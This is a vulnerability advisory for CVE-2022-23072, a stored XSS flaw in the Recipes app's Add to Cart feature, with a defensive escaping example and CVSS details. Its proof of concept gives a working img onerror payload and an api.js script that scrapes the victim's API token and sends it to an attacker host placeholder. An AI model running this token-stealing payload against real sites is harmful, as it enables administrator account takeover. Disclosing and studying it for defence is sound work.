CVE-2022-23072: Mend Vulnerability Database

CVE
#xss #vulnerability #web #js #java #auth

CVE-2022-23072

Date: January 11, 2022

Overview

Recipes versions 1.0.5 through 1.2.5 are vulnerable to stored cross-site scripting (XSS) in the "Add to Cart" functionality. A low-privileged user can create a Food whose 'Name' field contains a JavaScript payload. When another user, for example an administrator, opens the food list page and clicks the Add to Shopping Cart icon for that entry, the payload executes in the victim's browser session. The injected script can read the victim's API key, so a low-privileged attacker can take over an administrator account.

Details

The stored food name is inserted into the shopping-cart UI without output encoding, so an `<img onerror=...>` element placed in the 'Name' parameter is parsed as markup and its event handler runs in the context of whichever user adds the food to their cart. The PoC below uses that handler to load a remote script which requests the victim's /settings/ page (where the logged-in user's API token is rendered into the HTML), extracts the token, and forwards it to an attacker-controlled listener. With an administrator's API key the attacker can act as that administrator through the API.

PoC Details

Log in to the application through a web browser as a low-privileged user and open the food list from the navigation bar. On the food list page, click the plus ('+') icon, enter the XSS payload from the "PoC Code" section in the name field, and save the new Food. Host the JavaScript file that scrapes the victim's API key (api.js in the "PoC Code" section) on a server you control, and start a listener on the attacker host and port referenced in that file. In a separate browser session, log in as an administrator and open the food list page. Clicking the Add to Shopping Cart icon for the planted entry triggers the payload: the injected script fetches the administrator's settings page, extracts the API key, and sends it to the attacker's listener.

PoC Code

XSS payload: 
<img src=a onerror="var x=document.createElement('script');x.src='<attacker_server>/api.js';document.body.appendChild(x);">

JavaScript file (api.js):
var req = new XMLHttpRequest();
req.onload = handleResponse;
// Same-origin request: the victim's session cookie is sent automatically.
req.open('get', '/settings/', true);
req.send();

function handleResponse() {
    // The settings page renders the user's API token in its HTML as
    // "Authorization: Token <value>"; scrape it out of the response body.
    var a = this.responseText.match(/Authorization: Token.{1,}/)[0];
    a = a.split("Token ")[1];
    a = a.split("<")[0];
    console.log(a);
    // Exfiltrate the token to the attacker's listener as part of the URL.
    var changeReq = new XMLHttpRequest();
    changeReq.open('get', '<attacker_server>:<attacker_port>/api=' + a, false);
    changeReq.send();
}
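As an added illustration that is not part of the advisory or of the Recipes code base, the following shows why a food name like the PoC payload fires when it is spliced into markup, and how encoding the name at the point of output defuses it. The DOM is modelled as plain strings so the example runs under Node without a browser; the `cart-row` markup, `renderCartRow*` and `hasInlineHandler` names are hypothetical and do not correspond to functions in Recipes.

```javascript
// Added illustration (not code from the advisory or from the Recipes
// project): the unsafe rendering shape beside the output-encoded one.
// The DOM is modelled as strings so this runs in Node without a browser.

// Payload exactly as given in the PoC; <attacker_server> is the advisory's placeholder.
const POC_PAYLOAD =
  '<img src=a onerror="var x=document.createElement(\'script\');' +
  "x.src='<attacker_server>/api.js';document.body.appendChild(x);\">";

// Entity-encode the five characters that matter in text nodes and quoted attributes.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable shape (hypothetical): the untrusted name is concatenated into
// markup that is later assigned to innerHTML or rendered through an
// unescaped binding. The browser parses the name as HTML, creates the
// <img>, the bogus src fails to load, and the onerror handler executes.
function renderCartRowUnsafe(foodName) {
  return '<li class="cart-row">' + foodName + '</li>';
}

// Hardened shape: encode at the point of output. The same name is now inert
// text; the user sees the literal "<img ..." string and nothing executes.
function renderCartRowSafe(foodName) {
  return '<li class="cart-row">' + escapeHtml(foodName) + '</li>';
}

// Coarse check for rendered markup: a real tag carrying an on* handler
// attribute. Adequate as a unit-test guard on a template; not a general
// XSS detector.
function hasInlineHandler(html) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Render one name both ways and report whether each output still carries
// a live event handler.
function compare(foodName) {
  const unsafe = renderCartRowUnsafe(foodName);
  const safe = renderCartRowSafe(foodName);
  return {
    unsafe,
    safe,
    unsafeHasHandler: hasInlineHandler(unsafe),
    safeHasHandler: hasInlineHandler(safe),
  };
}

console.log(compare('Tomato'));      // harmless name: no handler either way
console.log(compare(POC_PAYLOAD));   // unsafe: handler present; safe: none
```

The same principle applies whichever layer does the rendering: a Django template auto-escapes by default, and a Vue template's `{{ }}` binding escapes as well, so the dangerous cases are `|safe`, `v-html`, and manual `innerHTML` concatenation of data another user controls.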

Affected Environments

1.0.5 through 1.2.5

Prevention

Upgrade Recipes to version 1.2.6 or later.

Language: Python

Good to know:

  • Severity Score: 5.4 (CVSS v3.1)
  • Weakness Type (CWE): Cross-Site Scripting (XSS), CWE-79
  • Top Fix: Upgrade to version 1.2.6

CVSS v3.1

  • Base Score: 5.4 (Medium)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
  • Attack Vector (AV): Network
  • Attack Complexity (AC): Low
  • Privileges Required (PR): Low
  • User Interaction (UI): Required
  • Scope (S): Changed
  • Confidentiality (C): Low
  • Integrity (I): Low
  • Availability (A): None
